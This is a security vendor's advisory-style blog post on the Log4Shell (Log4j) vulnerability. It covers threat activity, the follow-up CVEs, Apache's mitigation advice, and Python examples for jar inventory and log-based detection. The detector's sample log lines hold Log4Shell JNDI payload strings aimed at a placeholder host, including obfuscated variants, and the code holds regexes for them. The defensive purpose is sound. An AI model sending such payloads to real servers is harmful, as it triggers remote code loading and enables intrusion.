A Log4j RCE Vulnerability Update

The Fortis Security, Incident Response, and Threat Intelligence teams have been tracking activity related to the recently exploited Log4j remote code execution (RCE) vulnerability, also known as Log4Shell. Since this vulnerability came to light one week ago, the Fortis team has been aggressively threat hunting in our customers' environments while developing and implementing new detection signatures to alert on possible malicious scanning and post-exploitation activity based on known indicators of compromise.

Although there are scattered reports of APT groups, ransomware groups, and other threat actors beginning to use this vulnerability as an initial access vector for dropping second-stage payloads and potentially deploying ransomware, the majority of exploitation activity seen since the initial exploits has involved the installation of cryptocurrency miners and recruitment into Mirai and other botnets.

Reported instances of ransomware and post-exploitation activity have primarily involved the Khonsari ransomware family, the dropping of Cobalt Strike beacons, and the use and sale of access obtained through this vulnerability by access brokers. Several sources have reported emerging activity attributed to known APT groups and threat actors in China and Iran, as well as potentially North Korea and Turkey. Most notable of these groups are the Iran-based APT35 (aka Charming Kitten or Phosphorus) and the China-based HAFNIUM, which is best known for its exploitation of Microsoft Exchange servers early in 2021.

This vulnerability in Log4j is being leveraged as an initial access vector, which is an early phase in what is known as the cyber kill chain. This stage comes after the first two stages of reconnaissance and resource development and before execution, persistence, and privilege escalation. Access to environments, whether brokered or obtained directly, is expected to be used by these threat actors in either the short or the long term, as threat actors have been known to lie quiet in a compromised environment for extended periods before actively deploying ransomware or mass exploitation.

Official mitigation advice has been updated to cover the new CVE-2021-45046, which was discovered after the 2.15.0 patch was released. This new CVE has recently been upgraded to a CVSS score of 9.0. Currently, this CVE has only been demonstrated in macOS environments. A third vulnerability, CVE-2021-45105 (CVSS 7.5), has also been published; it addresses a denial-of-service condition arising from the possibility of infinite recursion.

Apache currently recommends updating to version 2.17.0, as this addresses all three known CVEs for Log4j. Several previous mitigation recommendations have now been deprecated by the Apache team because they leave additional attack vectors open rather than completely remediating the vulnerability. The current recommendation for safe and comprehensive mitigation is to update to the most recent safe version (2.17.0 as of 12/20/2021) or to remove the JndiLookup class from the log4j-core jar. Please review the "Older (discredited) mitigation measures" headings in the attached Apache link for additional technical details.
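As an added illustration of the two recommended actions (this is example code, not Fortis's or Apache's own tooling), the following Python inventories a log4j-core jar by its manifest version, flags it when it is older than 2.17.0 and still ships JndiLookup.class, and can strip that class as the fallback mitigation. The `build_sample_jar` helper, the sample jar contents, and the 2.17.0 threshold are assumptions made for the demonstration.

```python
import re
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
SAFE_VERSION = (2, 17, 0)  # Apache's recommended version at the time of this post

def parse_version(text):
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)  # '2.14.1' -> (2, 14, 1)
    return tuple(int(p) for p in m.groups()) if m else None

def jar_version(jar):
    """Implementation-Version from META-INF/MANIFEST.MF, or None if absent."""
    try:
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.lower().startswith("implementation-version:"):
            return parse_version(line.split(":", 1)[1])
    return None

def assess_jar(path):
    """Inventory one jar; an unknown version with JndiLookup present is treated as vulnerable."""
    with zipfile.ZipFile(path) as jar:
        version, has_jndi = jar_version(jar), JNDI_CLASS in jar.namelist()
    needs_action = has_jndi and (version is None or version < SAFE_VERSION)
    return {"path": str(path), "version": version,
            "jndi_lookup_present": has_jndi, "needs_action": needs_action}

def strip_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class (the fallback when upgrading is not possible)."""
    path = Path(path)
    tmp = path.with_name(path.name + ".tmp")
    removed = False
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            if item.filename == JNDI_CLASS:
                removed = True
                continue
            dst.writestr(item, src.read(item.filename))
    tmp.replace(path)  # atomic swap of the rewritten jar over the original
    return removed

def build_sample_jar(path, version, include_jndi=True):
    """Constructed stand-in for a real log4j-core jar, used only to exercise the functions above."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class file
```

Jars nested inside WAR or EAR archives are not opened here, so an inventory based on this alone will miss bundled copies.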

Overall recommendations remain to prioritize asset inventory, isolation of vulnerable assets, and aggressive patching for this vulnerability to limit the attack surface. Continue working with third-party vendors to apply recommended patches for their products, and encourage end users to apply approved and recommended updates. Additional recommendations include limiting outbound connections to trusted destinations and monitoring for suspicious or unapproved outbound traffic, including LDAP connections, from either the internal network or the DMZ. Such outbound connections to attacker-controlled listeners may be redirected to hosts serving second-stage payloads for delivery to the target.

The primary activity observed by the Fortis team has been mass scanning, along with some attempts at data exfiltration using specially crafted requests. Many vendors were able to identify malicious IP addresses and domains and add them to threat feeds and block lists almost immediately, thanks to the mobilization of the entire security community. A large volume of data has been collected both by the Fortis team and by the security research community to assist in building actionable detections for this activity. However, the ease with which this vulnerability can be tested and exploited complicates these indicators, rendering many of them low-fidelity or benign. Nonetheless, the Fortis team has implemented alerting based on current intelligence and all currently updated signatures released by vendors. Additionally, the team has put in place proprietary behavior-based alerts for the products we ingest for our customers, including EDR tools, firewalls, Fortis IDS sensors, and DNS-based alerting.
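An added example, not Fortis's own detection content: a small Python detector that normalizes web access-log lines (URL decoding and collapsing nested lookups) and flags JNDI lookup strings, reporting the source IP and the callback host so they can be reviewed or blocked. The log lines, IP addresses, and hostnames are constructed placeholders, not real indicators.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines; IPs and hostnames are placeholders, not real indicators.
SAMPLE_LOG = """\
203.0.113.10 - - [15/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [15/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example/a}"
203.0.113.12 - - [15/Dec/2021:10:01:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.13 - - [15/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://scanner.example/c}"
"""

NESTED = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)  # ${lower:j} -> j
DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")                         # ${x:-j}   -> j
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)

def normalize(text):
    """Undo (double) URL encoding and collapse nested lookups until the text stops changing."""
    text = unquote(unquote(text))
    prev = None
    while prev != text:
        prev = text
        text = DEFAULT.sub(r"\1", NESTED.sub(r"\1", text))
    return text

def find_jndi(line):
    """Return (scheme, callback_host) if the line carries a JNDI lookup string, else None."""
    m = JNDI.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None

def detect(log_text):
    """One alert per log line containing a JNDI lookup; src_ip is the first field of the line."""
    alerts = []
    for line in log_text.splitlines():
        hit = find_jndi(line)
        if hit:
            alerts.append({"src_ip": line.split(" ", 1)[0],
                           "scheme": hit[0], "callback_host": hit[1]})
    return alerts
```

Because research scanners produce the same pattern, treat a hit as a low-fidelity lead and correlate it with outbound LDAP, RMI, or DNS activity from the receiving host before escalating.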

As the number of cyberattacks continues to increase at an exponential rate, the Fortis team remains vigilant in our mission to stop breaches before they occur. We are fighting for you with 24x7x365 monitoring of your environment through our Security Operations Center (SOC), Incident Response, and Threat Intelligence teams to help lower the time to detect and respond to active threats. Our Incident Response team is always ready to engage at (844) 297-4853.

References and additional information: